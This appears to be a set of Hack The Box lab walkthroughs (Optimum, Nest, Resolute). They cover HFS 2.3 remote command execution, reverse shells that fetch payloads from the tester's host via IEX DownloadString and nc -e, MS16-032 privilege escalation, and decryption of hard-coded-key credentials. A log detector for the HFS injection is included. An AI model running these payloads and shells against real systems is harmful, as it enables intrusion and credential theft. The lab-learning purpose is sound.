|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|2008|2016|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).

Okay. Let’s go to 10.10.10.8

[Firefox at http://10.10.10.8: HFS front page with a Login link, "No files in this folder" (0 folders, 0 files, 0 bytes), a Search box, and at the bottom left "Server information: HttpFileServer 2.3", server time 3/6/2020, server uptime 10:37:37]

Look at the bottom left. We get HttpFileServer 2.3

Let’s poke around on SearchSploit:

searchsploit hfs
---------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                              |  Path (/usr/share/exploitdb/)
---------------------------------------------------------------------------- ----------------------------------------
Apple Mac OSX 10.4.8 - HFS+ DO_..._TRUNCATE Denial of Service              | exploits/osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)                    | exploits/osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure                | exploits/osx/local/35488.c
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation         | exploits/osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution                 | exploits/windows/remote/37985.py
Linux Kernel 2.6.x SquashFS Double-Free Denial of Service                  | exploits/linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)     | exploits/windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities          | exploits/windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload             | exploits/multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution            | exploits/windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution            | exploits/windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution   | exploits/windows/webapps/34852.txt
---------------------------------------------------------------------------- ----------------------------------------

RCE always looks fun. Let’s look at that one… specifically the .txt file:

issue exists due to a poor regex in the file ParserLib.pas
function findMacroMarker(s:string; ...
begin result:= ... , ofs) end;
it will not handle null byte so a request to
http://localhost:... {.exec|cmd.}
will stop regex from parse macro,
and macro will be executed and remote code injection happen.

EDB Note: This vulnerability will run the payload multiple times simultaneously.
Make sure to take this into consideration when crafting your payload (and/or listener).

So basically we need to apply a null byte and then {.exec|cmd.} where cmd is whatever command we want. Let’s use burp to try this out. It took me a while to figure this out and I actually had to watch Ippsec’s video but in it he explains the importance of SysNative vs. SysWow64 vs System32.
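The same trait that makes this work, a null byte in front of an HFS macro, is also what a defender can key on in request logs. The following detector is an added example for this write-up (not HFS's code or the exploit): it URL-decodes each request line, reports the null byte, the macro names and the query parameters that carried them, and grades the hit; the request lines are constructed, and the macro names other than exec are my assumption about which HFS template macros matter.

```python
"""Spot HFS 2.3 null-byte macro injection (the pattern in EDB 34668/39161:
a %00 that stops findMacroMarker's regex, followed by an HFS {.name|args.}
macro) in HTTP request lines.

Added example for this write-up, not code from HFS or the exploit. The
request lines are constructed; the macro names other than exec are my
assumption about which HFS template macros matter (exec is the one the
advisory names)."""
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# HFS macro sy ntax is {.name|arg1|arg2.}; capture the name.
MACRO_RE = re.compile(r'\{\.\s*([a-z_]+)\s*(?:\||\.\})', re.IGNORECASE)
DANGEROUS_MACROS = {"exec", "save", "append", "delete", "load"}

SAMPLE_REQUESTS = [
    "GET / HTTP/1.1",
    "GET /?search=report HTTP/1.1",
    "GET /?search=%00{.exec|cmd.} HTTP/1.1",        # shape from the advisory
    "GET /?search=%00%7B.exec%7Ccmd.%7D HTTP/1.1",  # same thing fully encoded
    "GET /?search=%00 HTTP/1.1",                    # bare null-byte probe
]


def analyze_request(request_line):
    """Return a finding for one 'METHOD target HTTP/x.y' line, or None."""
    try:
        method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return None
    decoded = unquote(target)            # one decode pass, like the server
    has_null = "\x00" in decoded
    macros = [m.group(1).lower() for m in MACRO_RE.finditer(decoded)]
    if not has_null and not macros:
        return None
    # Which query parameters carried the payload (decoded per parameter).
    params = [k for k, v in parse_qsl(urlsplit(target).query,
                                      keep_blank_values=True)
              if "\x00" in v or MACRO_RE.search(v)]
    if DANGEROUS_MACROS & set(macros):
        severity = "critical"
    elif macros:
        severity = "high"
    else:
        severity = "medium"              # null byte alone: probing
    return {"method": method, "null_byte": has_null, "macros": macros,
            "params": params, "severity": severity}


def scan(request_lines):
    return [hit for hit in map(analyze_request, request_lines) if hit]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print(hit)
```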

And in our icmp dump we get:

20:58:30.657617 IP 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 37
20:58:30.657649 IP hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 37
20:58:30.703055 IP 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 38
20:58:30.703087 IP hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 38
20:58:30.706503 IP 10.10.10.8 > hyd3: ICMP echo request, id 1, seq 39
20:58:30.706526 IP hyd3 > 10.10.10.8: ICMP echo reply, id 1, seq 39
... (echo request/reply pairs continue, several per second, through seq 51)

So we have command execution! Now, let’s copy Invoke-PowerShellTcp.ps1 to our working directory and append the file with the example usage given in the PS1 script:

        $client.Close()
        if ($listener)
        {
            $listener.Stop()
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.30 -Port ...

Serve it up on our box:

kali@hyd3:~/Documents/htb/optimum$ sudo python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [27/May/2020 17:22:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 17:22:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 17:22:31] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 17:22:32] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 20:53:51] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
10.10.10.8 - - [27/May/2020 20:53:51] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

Now let’s supply the correct argument to burp and remember to URL encode it. Don’t forget to set up your listener.

On our listener, we get a user shell:

kali@hyd3:~/Documents/htb/optimum$ rlwrap nc -nvlp
listening on [any] ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49282
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\...>

Looking around we get some creds that are pretty much useless at this point (but we keep enumerating anyway!)

DefaultDomainName
DefaultUserName         kostas
DefaultPassword         kdeEjDowkS*
AltDefaultDomainName
AltDefaultUserName
AltDefaultPassword

At this point, I ran sherlock.ps1 to help me out a bit.

kali@hyd3:~/Documents/htb/optimum$ rlwrap nc -nvlp
listening on [any] ...
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49295
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\...> ... http://10.10.14.30/winPEAS_64.exe -outfile winpeas64.exe
PS C:\...> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.30/Sherlock.ps1')

Title      : User Mode to Ring (KiTrap0D)
MSBulletin : MS10-015
CVEID      : 2010-0232
Link       : https://www.exploit-db.com/exploits/11199/
VulnStatus : Not supported on 64-bit systems

Title      : Task Scheduler .XML
MSBulletin : MS10-092
CVEID      : 2010-3338, 2010-3888
Link       : https://www.exploit-db.com/exploits/19930/
VulnStatus : Not Vulnerable

Title      : NTUserMessageCall Win32k Kernel Pool Overflow
MSBulletin : MS13-053
CVEID      : 2013-1300
Link       : https://www.exploit-db.com/exploits/33213/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenuEx Win32k NULL Page
MSBulletin : MS13-081
CVEID      : 2013-3881
Link       : https://www.exploit-db.com/exploits/31576/
VulnStatus : Not supported on 64-bit systems

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Not Vulnerable

Title      : ClientCopyImage Win32k
MSBulletin : MS15-051
CVEID      : 2015-1701, 2015-2433
Link       : https://www.exploit-db.com/exploits/37367/
VulnStatus : Not Vulnerable

Hmm. At first I tried using an off-the-shelf MS16-032.ps1 script, but it doesn’t work here because it spawns a new terminal window. We don’t have an interactive desktop, so we can’t use it. IppSec’s video shows that there’s a copy in Empire that can be used from the CLI.

Testing it out:

PS C:\...> Invoke-MS16-032
[by b33f @FuzzySec]
Operating system core count: 2
Duplicating CreateProcessWithLogonW handle
Done, using thread handle: 2472
Sniffing out privileged impersonation token..
Thread belongs to: svchost
Thread suspended
Wiping current impersonation token
Building SYSTEM impersonation token
Success, open SYSTEM token handle: 2468
Resuming thread..
Sniffing out SYSTEM shell..
Duplicating SYSTEM token
Starting token race
Starting process race
Holy handle leak Batman, we have a SYSTEM shell!!
PS C:\...> whoami
optimum\kostas

So we can use this modified MS16-032 that accepts commands.

To use it, you have to edit the bottom of the script so that it calls the function with the command you want, as the script itself explains:

        Return
        $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1)
        $CallResult = [Kernel32]::...
        $CallResult = [Kernel32]::...
        $StartTokenRace.Stop()
        $SafeGuard.Stop()
    }
}
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.30/rev4445.ps1')"

Create another reverse TCP script that uses a different port (I called mine rev4445.ps1).

Running it:

PS C:\...> iex(New-Object Net.WebClient).DownloadString('http://10.10.14.30/Invoke-MS16032.ps1')
[by b33f @FuzzySec]
[!] Holy handle leak Batman, we have a SYSTEM shell!!
PS C:\...>

And on our other listener, the one we set up on port 4445, we get an NT AUTHORITY\SYSTEM shell:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.8/scans$ rlwrap nc -nvlp 4445
listening on [any] 4445
connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49325
Windows PowerShell running as user SYSTEM on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\...> whoami
nt authority\system
PS C:\...>

Nest – No Metasploit

Definitely learned a new thing or two with this box. Anyway, let’s fire off nmap:

Okay… so let’s go look at port 4386 to try to see what it is.

HQK Reporting Service? Erm. OK. Port 445 was open, so let’s run smbclient to list the shares and smbmap to list their contents:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.178/scans$ cat smbclient.txt
WARNING: The "syslog" option is deprecated

        Sharename       Type      Comment
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk

(smbmap -R output; the timestamps did not survive the screenshot)
        ADMIN$                                  NO ACCESS    Remote Admin
        C$                                      NO ACCESS    Default share
        Data                                    READ ONLY
        .\Data
        dr--r--r--                IT
        dr--r--r--                Production
        dr--r--r--                Reports
        dr--r--r--                Shared
        dr--r--r--                Maintenance
        dr--r--r--                Templates
        fr--r--r--             48 Maintenance Alerts.txt
        dr--r--r--                HR
        dr--r--r--                Marketing
        fr--r--r--            425 Welcome Email.txt
        IPC$                                    NO ACCESS    Remote IPC
        Secure$                                 NO ACCESS
        Users                                   READ ONLY
        dr--r--r--                Administrator
        dr--r--r--                C.Smith
        dr--r--r--                L.Frost
        dr--r--r--                R.Thompson
        dr--r--r--                TempUser

What’s in Welcome Email.txt?

Cool. So we got a password. No… don’t go trying to use it just yet. Continue enumerating.

Looking at NotepadPlusPlus config.xml:

Looking at RU_config.xml:

… and that’s why we continue to enumerate FIRST.

Okay, so trying the creds we’ve found so far, we figure out a couple of things.

TempUser can get access with welcome2019.

So can L.Frost, but L.Frost can only log in with welcome2019, not list shares, for some reason (access denied).

Same with R.Thompson…

We also have User: C.Smith and Password: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE= (the encrypted value), and TempUser can list the contents of the Secure$\IT\Carl\ directory:

kali@hyd3:~/Tools/AutoRecon/results/10.10.10.178/scans$ smbclient //10.10.10.178/Secure$ -U TempUser
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  Finance
  HR
  IT

\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\HR
NT_STATUS_ACCESS_DENIED listing \HR\*
\IT
NT_STATUS_ACCESS_DENIED listing \IT\*
smb: \> cd IT\Carl\
smb: \IT\Carl\> ls
  Docs
  Reports
  VB Projects

\IT\Carl\Docs
  ip.txt                  56
  MC.txt                  73

\IT\Carl\Reports

With the encrypted password in hand: the RUScanner project had VB files (Module1.vb) showing how the password gets decrypted.

kali@hyd3:~/Documents/htb/nest/smb/secure/RUScanner$ cat Module1.vb
Module Module1
    Sub Main()
        Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
    End Sub
End Module
kali@hyd3:~/Documents/htb/nest/smb/secure/RUScanner$ cat SsoIntegration.vb
Public Class SsoIntegration
    Public Property Username As String
    Public Property Password As String
End Class
kali@hyd3:~/Documents/htb/nest/smb/secure/RUScanner$ cat ConfigFile.vb
Public Class ConfigFile
    Public Property Port As Integer
    Public Property Username As String
    Public Property Password As String

    ' Serialises this object to XML (this is how RU_Config.xml is written)
    Public Sub SaveToFile(Path As String)
        Using File As New IO.FileStream(Path, IO.FileMode.Create)
            Dim Writer As New Xml.Serialization.XmlSerializer(GetType(ConfigFile))
            Writer.Serialize(File, Me)
        End Using
    End Sub

    ' Reads RU_Config.xml back into a ConfigFile; Password is still the encrypted string
    Public Shared Function LoadFromFile(ByVal FilePath As String) As ConfigFile
        Using File As New IO.FileStream(FilePath, IO.FileMode.Open)
            Dim Reader As New Xml.Serialization.XmlSerializer(GetType(ConfigFile))
            Return DirectCast(Reader.Deserialize(File), ConfigFile)
        End Using
    End Function
End Class

Utils.vb had the actual code that decrypts the password:

kali@hyd3:~/Documents/htb/nest/smb/secure/RUScanner$ cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography

Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    ' Passphrase, salt, iteration count, IV and key size are all hard-coded here
    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                   ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _

So I needed a nudge on this, because this was all REALLY beyond my brain capacity at the time (but wouldn’t be for long!). It involved A LOT of trial and error.

Cutting and pasting the code into .NET Fiddle (https://dotnetfiddle.net), removing all the unnecessary (non-encryption-related) functions, adding Imports System at the top (to get rid of the errors and pull in the classes the code needs) and adding Console.WriteLine(plainText) before the decrypt function returns gave us this code:

That last portion was used to just decrypt the actual string that we found earlier. This returned the password:

    Sub Main()
        Dim test As New SsoIntegration With {.Username = "c.smith", .Password = Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")}
    End Sub
End Class

xRxRxPANCAK3SxRxRx
Last Run: 10:00:46 pm

The password is: xRxRxPANCAK3SxRxRx
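The same decryption the author reproduced in .NET Fiddle, as an added Go reimplementation (not code from the writeup or from the RU Scanner project): it assumes Utils.Decrypt derives its key with Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) and runs AES-CBC with PKCS#7 padding, and it takes the passphrase, salt, iteration count, IV and key size from the DecryptString call shown above. Because every parameter is fixed in the binary, anyone who can read the DLL or the source can decrypt every RU_Config.xml the tool ever wrote.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/base64"
	"errors"
	"fmt"
)

// Parameters hard-coded in Utils.vb: passphrase, salt, iteration count, IV and key size.
const (
	PassPhrase = "N3st22"
	SaltValue  = "88552299"
	Iterations = 2
	InitVector = "464R5DFA5DL6LE28" // 16 ASCII bytes = exactly one AES block
	KeySize    = 256
)

// pbkdf2SHA1 is PBKDF2-HMAC-SHA1 (RFC 2898), which is what .NET's Rfc2898DeriveBytes
// computes (assumption: that is the KDF Utils.Decrypt uses). Two iterations gives no
// brute-force protection at all; a real KDF would use hundreds of thousands.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	var out []byte
	for block := 1; len(out) < keyLen; block++ {
		mac := hmac.New(sha1.New, password)
		mac.Write(salt)
		mac.Write([]byte{byte(block >> 24), byte(block >> 16), byte(block >> 8), byte(block)})
		u := mac.Sum(nil) // U1
		t := append([]byte(nil), u...)
		for i := 1; i < iter; i++ {
			mac = hmac.New(sha1.New, password)
			mac.Write(u)
			u = mac.Sum(nil) // U_i = PRF(password, U_{i-1})
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// Decrypt mirrors Utils.Decrypt: Base64 decode, AES-CBC with the PBKDF2 key and the
// ASCII IV, then strip PKCS#7 padding (the .NET default).
func Decrypt(cipherText, passPhrase, saltValue string, passwordIterations int, initVector string, keySize int) (string, error) {
	data, err := base64.StdEncoding.DecodeString(cipherText)
	if err != nil {
		return "", err
	}
	if len(data) == 0 || len(data)%aes.BlockSize != 0 || len(initVector) != aes.BlockSize {
		return "", errors.New("ciphertext or IV is not a whole number of AES blocks")
	}
	key := pbkdf2SHA1([]byte(passPhrase), []byte(saltValue), passwordIterations, keySize/8)
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	plain := make([]byte, len(data))
	cipher.NewCBCDecrypter(block, []byte(initVector)).CryptBlocks(plain, data)
	pad := int(plain[len(plain)-1])
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(plain[len(plain)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("invalid PKCS#7 padding (wrong key or IV, or corrupted data)")
	}
	return string(plain[:len(plain)-pad]), nil
}

// DecryptString mirrors Utils.DecryptString, including its empty-string shortcut.
func DecryptString(encrypted string) (string, error) {
	if encrypted == "" {
		return "", nil
	}
	return Decrypt(encrypted, PassPhrase, SaltValue, Iterations, InitVector, KeySize)
}

// Ciphertext from RU_config.xml as quoted in the writeup.
func main() { fmt.Println(DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")) }
```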

Using this, we can try to access the share with C.Smith’s username:

kali@hyd3:~/Documents/htb/nest/smb/secure/RUScanner$ smbclient //10.10.10.178/Users -U c.smith
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> dir
  Administrator
  C.Smith
  L.Frost
  R.Thompson
  TempUser

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  HQK Reporting
  user.txt                32

We can then just download user.txt and read it:

smb: \> cd C.Smith\
smb: \C.Smith\> type user.txt
type: command not found
smb: \C.Smith\> get user.txt /home/kali/Documents/htb/nest/user.txt
getting file \C.Smith\user.txt of size 32 as /home/kali/Documents/htb/nest/user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

Now onto root. Looking around, we see some interesting files in HQK Reporting:

smb: \C.Smith\HQK Reporting\> dir
  AD Integration Module
  Debug Mode Password.txt
  HQK_Config_Backup.xml           249

\C.Smith\HQK Reporting\AD Integration Module
  HqkLdap.exe                   17408

HQK_Config_Backup.xml contents:

Debug Mode Password.txt looks interesting. After looking at it for hours, I remembered that alternate data streams can be used to hide data inside files.

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 2019 EDT
access_time:    Thu Aug  8 2019 EDT
write_time:     Thu Aug  8 2019 EDT
change_time:    Thu Aug  8 2019 EDT
attributes: A (20)
stream: [::$DATA], … bytes
stream: [:Password:$DATA], 15 bytes

Interesting… so there’s a stream called Password!

smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password" /home/kali/Documents/htb/nest/c.smith/passwordhidden.txt
getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as /home/kali/Documents/htb/nest/c.smith/passwordhidden.txt (0.1 KiloBytes/sec) (average 24.8 KiloBytes/sec)

Okay, so we know this is associated with the HQK service on port 4386. Let’s try to telnet with these creds:

Reading the manual for HQK Reporting Service, we can figure out the commands used to enumerate what is on the service.

>SETDIR .
Current directory set to HQK
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]    HqkSvc.exe
[2]    HqkSvc.InstallState
[3]    HQK_Config.xml

Current Directory: HQK
>SETDIR LDAP
Current directory set to LDAP
>list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1]    HqkLdap.exe
[2]    Ldap.conf

Current Directory: LDAP
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,DC=nest,DC=local
User=Administrator

To be continued…

Resolute – No Metasploit

Doing initial nmap recon, we get some lengthy output:

PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain?      syn-ack ttl 127
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-05-19 20:00:38Z)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49688/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49712/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
55190/tcp open  unknown      syn-ack ttl 127
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 (93%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

So it looks like it’s a Windows box with quite a lot of ports open. My eye first caught ports 139/445. Running enum4linux against Resolute, we get some interesting information. I missed this the first time, but looking back over everything line by line, I found some really juicy info:

Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\DefaultAccount
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\ryan
Group 'Domain Users' (RID: 513) has member: MEGABANK\marko
Group 'Domain Users' (RID: 513) has member: MEGABANK\sunita
Group 'Domain Users' (RID: 513) has member: MEGABANK\abigail
Group 'Domain Users' (RID: 513) has member: MEGABANK\marcus
Group 'Domain Users' (RID: 513) has member: MEGABANK\sally
Group 'Domain Users' (RID: 513) has member: MEGABANK\fred
Group 'Domain Users' (RID: 513) has member: MEGABANK\angela
Group 'Domain Users' (RID: 513) has member: MEGABANK\felicia
Group 'Domain Users' (RID: 513) has member: MEGABANK\gustavo
Group 'Domain Users' (RID: 513) has member: MEGABANK\ulf
Group 'Domain Users' (RID: 513) has member: MEGABANK\stevie
Group 'Domain Users' (RID: 513) has member: MEGABANK\claire
Group 'Domain Users' (RID: 513) has member: MEGABANK\paulo
Group 'Domain Users' (RID: 513) has member: MEGABANK\steve
Group 'Domain Users' (RID: 513) has member: MEGABANK\annette
Group 'Domain Users' (RID: 513) has member: MEGABANK\annika
Group 'Domain Users' (RID: 513) has member: MEGABANK\per
Group 'Domain Users' (RID: 513) has member: MEGABANK\claude
Group 'Domain Users' (RID: 513) has member: MEGABANK\melanie
Group 'Domain Users' (RID: 513) has member: MEGABANK\zach
Group 'Domain Users' (RID: 513) has member: MEGABANK\simon
Group 'Domain Users' (RID: 513) has member: MEGABANK\naoki

index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko    Name: Marko Novak    Desc: Account created. Password set to Welcome123!

Okay, so we see Marko Novak’s password is set to Welcome123!. Trying it with evil-winrm to log in, we get an authentication failure. However, let’s think this through: this looks like the default password set for new users. Running down the list, we try it with the user melanie:

sudo evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\...> cd ..
*Evil-WinRM* PS C:\...> dir

So from here, I actually used PowerShell and uploaded nc.exe to get a more stable shell. Call me old-fashioned, but I just don’t like the Evil-WinRM shell.

*Evil-WinRM* PS C:\...> Start-Process 'C:\...\nc.exe' -ArgumentList '-e cmd.exe 10.10.14.22 443'

sudo nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.169] 53534
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\...>

I don’t remember quite why, but I ended up using Evil-WinRM’s shell anyway. It’s good to have a backup.

Looking around, we find an unusual file under C:\ called “PSTranscripts”. We found it by enumerating hidden files with dir -Force from the PowerShell prompt.

PS C:\...> type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\... .exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
Command start time: 20191203063455
PS>TerminatingError(): "System error."
CommandInvocation(Invoke-Expression): "Invoke-Expression"
ParameterBinding(Invoke-Expression): name="Command"; value="... ,$(whoami), ,$env:computername,' ' $pwd).Name), ' )
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
CommandInvocation(Out-String): "Out-String"
ParameterBinding(Out-String): name="Stream"; value="True"
Command start time: 20191203063455
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
